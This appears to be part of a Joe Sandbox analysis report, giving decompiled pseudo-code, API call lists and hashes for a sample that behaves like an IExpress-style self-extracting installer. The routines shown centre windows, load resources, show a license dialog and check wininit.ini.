                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				struct HWND__* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t67;
                                                                                                                                                                                                                                            				struct HWND__* _t68;
                                                                                                                                                                                                                                            				struct HDC__* _t69;
                                                                                                                                                                                                                                            				int _t72;
                                                                                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t63 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                            				_t68 = __edx;
                                                                                                                                                                                                                                            				_v44 = __ecx;
                                                                                                                                                                                                                                            				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                            				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                            				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                            				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                            				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                            				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                            				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                            				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                            				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                            				_t56 = _v48;
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                            				_t67 = 0;
                                                                                                                                                                                                                                            				if(_t72 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v52;
                                                                                                                                                                                                                                            					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                            						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t72 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                            				if(_t59 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v60;
                                                                                                                                                                                                                                            					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                            						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t59 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 008D43F1
                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 008D440B
                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 008D4423
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 008D442E
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 008D443A
                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 008D4447
                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 008D44A2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2212493051-0
                                                                                                                                                                                                                                            • Opcode ID: 2a5a810141d83dbdc3fd78594638732863c95b92f4584bbf3f2acbc7ef154304
                                                                                                                                                                                                                                            • Instruction ID: 8aa4a6effc2be3de9081d580db226c4f0f924520067d85bbcfb5d47034db7cec
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a5a810141d83dbdc3fd78594638732863c95b92f4584bbf3f2acbc7ef154304
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32311E32E01119AFCF14CFB8DD499EEBBB6FB89310F25426AE805F3250DA306D458B64
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                            			E008D6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				struct HRSRC__* _t21;
                                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                            				_t46 = 0;
                                                                                                                                                                                                                                            				_v32 = __ecx;
                                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                                            				_t36 = 1;
                                                                                                                                                                                                                                            				E008D171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                            					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                                                                                                            						 *0x8d9124 = 0x80070714;
                                                                                                                                                                                                                                            						_t36 = _t46;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                            						_t44 = _t5;
                                                                                                                                                                                                                                            						_t40 = _t44;
                                                                                                                                                                                                                                            						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                            						_t47 = _t6;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t26 =  *_t40;
                                                                                                                                                                                                                                            							_t40 = _t40 + 1;
                                                                                                                                                                                                                                            						} while (_t26 != 0);
                                                                                                                                                                                                                                            						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                            						_t46 = _t51;
                                                                                                                                                                                                                                            						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                            						 *0x8da288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                            						_t30 = _v32();
                                                                                                                                                                                                                                            						if(_t51 != _t51) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(_t45);
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							_t36 = 0;
                                                                                                                                                                                                                                            							FreeResource(??);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							FreeResource();
                                                                                                                                                                                                                                            							_v36 = _v36 + 1;
                                                                                                                                                                                                                                            							E008D171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                            							_t46 = 0;
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					return E008D6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D171E: _vsnprintf.MSVCRT ref: 008D1750
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,008D51CA,00000004,00000024,008D2F71,?,00000002,00000000), ref: 008D62CD
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,008D51CA,00000004,00000024,008D2F71,?,00000002,00000000), ref: 008D62D4
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,008D51CA,00000004,00000024,008D2F71,?,00000002,00000000), ref: 008D631B
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 008D6345
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,008D51CA,00000004,00000024,008D2F71,?,00000002,00000000), ref: 008D6357
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                            • String ID: UPDFILE%lu
                                                                                                                                                                                                                                            • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                            • Opcode ID: bab955da73bebc3dee24d9b55b8478ff3a6929e58b3c4d02182582290ebd5bed
                                                                                                                                                                                                                                            • Instruction ID: e94a4b674f6c16f15506993ead7ff898b08622066e86ad8ff7d771af946969fa
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bab955da73bebc3dee24d9b55b8478ff3a6929e58b3c4d02182582290ebd5bed
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5521B675A0121DABDB189F649C499BEBB78FF44714B10031BE902E3341EB359D158BE1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E008D681F(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                            				void* _v172;
                                                                                                                                                                                                                                            				int* _v176;
                                                                                                                                                                                                                                            				int _v180;
                                                                                                                                                                                                                                            				int _v184;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t31;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t36 = __ebx;
                                                                                                                                                                                                                                            				_t19 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                            				_t41 =  *0x8d81d8; // 0x0
                                                                                                                                                                                                                                            				_t43 = 0;
                                                                                                                                                                                                                                            				_v180 = 0xc;
                                                                                                                                                                                                                                            				_v176 = 0;
                                                                                                                                                                                                                                            				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                            					 *0x8d81d8 = 0;
                                                                                                                                                                                                                                            					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            						_t41 =  *0x8d81d8; // 0x0
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t41 = 1;
                                                                                                                                                                                                                                            						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t31 = RegQueryValueExA(_v172, 0x8d1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                            							_t43 = _t31;
                                                                                                                                                                                                                                            							RegCloseKey(_v172);
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t40 =  &_v176;
                                                                                                                                                                                                                                            								if(E008D66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                            									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                            										 *0x8d81d8 = _t41;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L12;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 008D686E
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004A), ref: 008D68A7
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 008D68CC
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,008D1140,00000000,?,?,0000000C), ref: 008D68F4
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008D6902
                                                                                                                                                                                                                                              • Part of subcall function 008D66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,008D691A), ref: 008D6741
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Control Panel\Desktop\ResourceLocale, xrefs: 008D68C2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                            • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                            • Opcode ID: 1afa4974a342acfaa0728bb2bd01dd3a73409bf10c4fb8d5c0691365c13f5572
                                                                                                                                                                                                                                            • Instruction ID: 439f6fd484ade20deb2f9e553ac094d223fba78ded163645ee2c3c013ccc78b8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1afa4974a342acfaa0728bb2bd01dd3a73409bf10c4fb8d5c0691365c13f5572
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61317F31A0121DEFDF219B61CC54BAEBB78FB45728F1403A7E949E2240EB309D958F52
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D3A3F(void* __eflags) {
                                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = "LICENSE";
                                                                                                                                                                                                                                            				_t1 = E008D468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				 *0x8d8d4c = _t3;
                                                                                                                                                                                                                                            				if(_t3 != 0) {
                                                                                                                                                                                                                                            					_t19 = _t16;
                                                                                                                                                                                                                                            					if(E008D468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA( *0x8d8d4c, "<None>") == 0) {
                                                                                                                                                                                                                                            							LocalFree( *0x8d8d4c);
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0x8d9124 = 0;
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t9 = E008D6517(_t19, 0x7d1, 0, E008D3100, 0, 0);
                                                                                                                                                                                                                                            						LocalFree( *0x8d8d4c);
                                                                                                                                                                                                                                            						if(_t9 != 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x8d9124 = 0x800704c7;
                                                                                                                                                                                                                                            						L2:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E008D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree( *0x8d8d4c);
                                                                                                                                                                                                                                            					 *0x8d9124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L2;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E008D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46A0
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: SizeofResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46A9
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46C3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LoadResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46CC
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LockResource.KERNEL32(00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46D3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: memcpy_s.MSVCRT ref: 008D46E5
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,008D2F64,?,00000002,00000000), ref: 008D3A5D
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 008D3AB3
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                              • Part of subcall function 008D6285: GetLastError.KERNEL32(008D5BBC), ref: 008D6285
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(<None>,00000000), ref: 008D3AD0
                                                                                                                                                                                                                                            • LocalFree.KERNEL32 ref: 008D3B13
                                                                                                                                                                                                                                              • Part of subcall function 008D6517: FindResourceA.KERNEL32(008D0000,000007D6,00000005), ref: 008D652A
                                                                                                                                                                                                                                              • Part of subcall function 008D6517: LoadResource.KERNEL32(008D0000,00000000,?,?,008D2EE8,00000000,008D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 008D6538
                                                                                                                                                                                                                                              • Part of subcall function 008D6517: DialogBoxIndirectParamA.USER32(008D0000,00000000,00000547,008D19E0,00000000), ref: 008D6557
                                                                                                                                                                                                                                              • Part of subcall function 008D6517: FreeResource.KERNEL32(00000000,?,?,008D2EE8,00000000,008D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 008D6560
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,008D3100,00000000,00000000), ref: 008D3AF4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$LICENSE
                                                                                                                                                                                                                                            • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                            • Opcode ID: d998c8c39619d925b76a27f36c084880d2e0f848403b429e69d973669c46f9b3
                                                                                                                                                                                                                                            • Instruction ID: a7c94da7c124a9e5eaddd07987d07b1268825f4252378c2f4ddc74ca0f110d09
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d998c8c39619d925b76a27f36c084880d2e0f848403b429e69d973669c46f9b3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1511DA30342211FBDB24AF36AC09E173BBAFBD5710B10432FB542D63E0EA798C008626
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E008D24E0(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t7;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				long _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = __ebx;
                                                                                                                                                                                                                                            				_t7 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                            				_t25 = 0x104;
                                                                                                                                                                                                                                            				_t26 = 0;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					E008D658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                            					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                            					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                            					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                            						_lclose(_t25);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 008D2506
                                                                                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 008D252C
                                                                                                                                                                                                                                            • _lopen.KERNEL32 ref: 008D253B
                                                                                                                                                                                                                                            • _llseek.KERNEL32(00000000,00000000,00000002), ref: 008D254C
                                                                                                                                                                                                                                            • _lclose.KERNEL32(00000000), ref: 008D2555
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                            • String ID: wininit.ini
                                                                                                                                                                                                                                            • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                            • Opcode ID: e0ba4e883494cd07e285733102653503e494051140fa72c4e612e62aca28460d
                                                                                                                                                                                                                                            • Instruction ID: c1481c37af40914e1fbf9d3a4eac5eaad3b24bc9d42896bfcd089f84892fd406
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0ba4e883494cd07e285733102653503e494051140fa72c4e612e62aca28460d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF019232601518A7C720DB699C0CEDB7B7CFB45760F100256FA49D3290DA748E458AA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E008D36EE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                            				signed int _v420;
                                                                                                                                                                                                                                            				signed int _v424;
                                                                                                                                                                                                                                            				CHAR* _v428;
                                                                                                                                                                                                                                            				CHAR* _v432;
                                                                                                                                                                                                                                            				signed int _v436;
                                                                                                                                                                                                                                            				CHAR* _v440;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                                                                                            				CHAR* _t77;
